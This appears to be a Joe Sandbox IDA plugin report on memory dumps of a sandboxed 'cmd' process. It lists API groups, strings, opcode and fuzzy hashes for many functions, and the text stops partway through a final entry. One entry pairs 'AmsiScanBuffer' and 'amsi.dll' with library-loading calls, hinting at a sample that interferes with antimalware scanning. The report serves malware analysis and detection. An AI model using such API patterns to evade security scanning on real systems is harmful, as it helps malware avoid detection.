                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                            • String ID: CONOUT$
                                            • API String ID: 3230265001-3130406586
                                            • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                            • Instruction ID: 3927d23acae12af36557d29a73a1ed802fdb1fba5f6867fd6b227c365fe9ab07
                                            • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                            • Instruction Fuzzy Hash: 9F118135A58E4482E752CB52EC58B5976B0F388FE6F501214EE5E87F94CF38CA248748
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                             • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: Thread$Current$Context
                                            • String ID:
                                            • API String ID: 1666949209-0
                                            • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                            • Instruction ID: 2060af764a2a8beb54b54e8ca313e98812e2bc3769497323ea9f86981d42ef8a
                                            • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                            • Instruction Fuzzy Hash: 89D18C76688F8C81DA71DB0AE89539A7BA0F388BC5F101116EE8D47BB5DF39C651CB04
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                             • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: Thread$Current$Context
                                            • String ID:
                                            • API String ID: 1666949209-0
                                            • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                            • Instruction ID: 29287f9906854fe0bbadf7d9b39e07c6c366fe21028929edd2b29af620eb47ff
                                            • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                            • Instruction Fuzzy Hash: 4CD1AD36A48F4881EA71DB06E89435A77A0F3C8BC5F501126EACD47BA5DF39C651DB08
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                             • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: Free$CurrentThread
                                            • String ID:
                                            • API String ID: 564911740-0
                                            • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                            • Instruction ID: bbe35f6a3d5327017e726759b646d2b6fcbb5430ff6e0c23e27200ec1e9b986e
                                            • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                            • Instruction Fuzzy Hash: 7E51F534AC9F4985EA17EB25EC5929423A1FB047C6F802815A56C46BB5EF34CB38C748
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: Free$CurrentThread
                                            • String ID:
                                            • API String ID: 564911740-0
                                            • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                            • Instruction ID: 56772f9ca36d01151f8fb94c8f980b79a9c766d60bea2f6084df847a96cd4abe
                                            • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                            • Instruction Fuzzy Hash: DB51E830A89F4995EF17DB14EC5929433A1BB847C6FC02825A52C06BAAEF74C734E748
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocFree
                                            • String ID: $rbx-
                                            • API String ID: 756756679-3661604363
                                            • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                            • Instruction ID: 046fbe7a7a53380cf283fc916a2082e09008ada228940b19ccf6e94a6636a737
                                            • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                            • Instruction Fuzzy Hash: E3319031FC9F5982EA23DF16AD487696BA0BB84BD5F0854208F4847F65EF38D6718704
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocFree
                                            • String ID: $rbx-
                                            • API String ID: 756756679-3661604363
                                            • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                            • Instruction ID: 9969939ee6733e343f1b725536557de19c8334963863bf494099c7c904d144d5
                                            • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                            • Instruction Fuzzy Hash: 36318F31F49F598AEA22DF16AD4876963A0BBC4BE5F4850308E4807F55EF34D672D704
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: ErrorLast$Value$FreeHeap
                                            • String ID:
                                            • API String ID: 365477584-0
                                            • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                            • Instruction ID: 495ef5a2f674e4ec01d1111ca8450ea6ad0fd88e1e64026a80850e306927ccc6
                                            • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                            • Instruction Fuzzy Hash: 49118231EDCE4882F61BE7316C1D3AE11519B857D2F546628A86756FE6CE38C6214309
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: ErrorLast$Value$FreeHeap
                                            • String ID:
                                            • API String ID: 365477584-0
                                            • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                            • Instruction ID: 4823e9d42af6fb009c280dcd7625abb9b8260089cdd71581ffe43d8e75a430d2
                                            • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                            • Instruction Fuzzy Hash: 17116335E98A4981FA1AE7716C1D36A21515BC47E2FD466349C2756BC6CE38C631E30C
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                            • String ID:
                                            • API String ID: 517849248-0
                                            • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                            • Instruction ID: 565ba69d1770dfe958d18ff4585ee712fd763cd3809427d5b75715a4111fcc70
                                            • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                            • Instruction Fuzzy Hash: F1015E31F48E4886E612DB53A85839963A1F788FC1F8840359E9E43B64DF3CC655C744
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                            • String ID:
                                            • API String ID: 517849248-0
                                            • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                            • Instruction ID: 9ad6eb4a2602da1efdef18f989a1f60a69aeeb72d06c1d309da227052b922219
                                            • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                            • Instruction Fuzzy Hash: 28016D35F48F4882EB11DB12AC5879963A1F788FD2F9840359E5E43B54DE3CCA95C744
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                            • String ID:
                                            • API String ID: 449555515-0
                                            • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                            • Instruction ID: 9b50bd5c7fbaac5283920e25b597690c77893b0ba23a5d5c71579695fa9b195a
                                            • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                            • Instruction Fuzzy Hash: 66015234E89F4886EB26DB62EC4C35526B0AB45BC2F041024CA9E06B65EF3DC668C748
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                            • String ID:
                                            • API String ID: 449555515-0
                                            • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                            • Instruction ID: 4dc63d462c43f251940b842a41475abade451eed2df19e2d1d67c434bc0a1555
                                            • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                            • Instruction Fuzzy Hash: 97013C34A49F4882EF26DB21EC4D75532B0AB84B83F141424CE5E06BA5EF3DC268C708
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: FinalHandleNamePathlstrlen
                                            • String ID: \\?\
                                            • API String ID: 2719912262-4282027825
                                            • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                            • Instruction ID: 3f3f97ebb23d34517d82dce41771df903cbc1a9b22e44f313d4757244ebf553e
                                            • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                            • Instruction Fuzzy Hash: 7CF08132B88A8C92E722CB21ED883996770F744BC9F8450218A8942D74DF7CC768CB04
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: FinalHandleNamePathlstrlen
                                            • String ID: \\?\
                                            • API String ID: 2719912262-4282027825
                                            • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                            • Instruction ID: 1e083ff36067cebc913485dd5f8fe694f236df697e10d4e34c0d9d5cd6ab7c94
                                            • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                            • Instruction Fuzzy Hash: 0EF0A432B48A8892EB21CB21FC887996761F784BCAFD45021CE4942D64DE7CC768CB04
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: AddressFreeHandleLibraryModuleProc
                                            • String ID: CorExitProcess$mscoree.dll
                                            • API String ID: 4061214504-1276376045
                                            • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                            • Instruction ID: e6d2bb41030fe8d64a41724565bce881e662f9884ac5fc3ff9024df458b93858
                                            • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                            • Instruction Fuzzy Hash: 2DF09631BC9E0981EA13DB259C583991770EB857E2F542219DABA45DF4CF3CC658C708
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: CombinePath
                                            • String ID: \\.\pipe\
                                            • API String ID: 3422762182-91387939
                                            • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                            • Instruction ID: 0a6298a71ec25c15fdb3bd41dcfe449f678b118e7a68b6adc64997ef3c6a8da2
                                            • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                            • Instruction Fuzzy Hash: B6F05474F98F8C81EA46DB13BD181559651A748FC2F44A030ED5607F24CE78C6658708
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: AddressFreeHandleLibraryModuleProc
                                            • String ID: CorExitProcess$mscoree.dll
                                            • API String ID: 4061214504-1276376045
                                            • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                            • Instruction ID: dca8a4bf2ae75eff28bc547a055e2b0878789679ab6efe9437d7f8ef7dcb5292
                                            • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                            • Instruction Fuzzy Hash: B4F06231B89E0981EE16CB149C487991370AB857E2FA422299EBA45DE4CF3CC658C608
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: CombinePath
                                            • String ID: \\.\pipe\
                                            • API String ID: 3422762182-91387939
                                            • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                            • Instruction ID: a7d7b21a027f42043c60d873f366f04825da23393024157f3560f8a569eb4781
                                            • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                            • Instruction Fuzzy Hash: 16F05474F48F8881EE45DB12BD1C5555251A788FC2F54A031ED1A07F19DF38C6658704
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: AddressLibraryLoadProcSleep
                                            • String ID: AmsiScanBuffer$amsi.dll
                                            • API String ID: 188063004-3248079830
                                            • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                            • Instruction ID: 9b43a2dc71a65a5ed06d1777e3838516e3934217c799eb28aded687329b75ed4
                                            • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                            • Instruction Fuzzy Hash: F5D01234E99D08C1FD1AEB04DC5DB9422616B64BC3FE42025C80A01AA0DE3C4778D748
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                             • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: CurrentThread
                                            • String ID:
                                            • API String ID: 2882836952-0
                                            • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                            • Instruction ID: 8a80e15a6f8e452d0494f2695589e28ace3185ae0eeb4f23949a1adaf354b8b0
                                            • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                            • Instruction Fuzzy Hash: DA02EC32A9DB8886E761CB55F89435ABBA0F3C47D5F101015EA8E87BA8DF7CC554CB08
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                             • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: CurrentThread
                                            • String ID:
                                            • API String ID: 2882836952-0
                                            • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
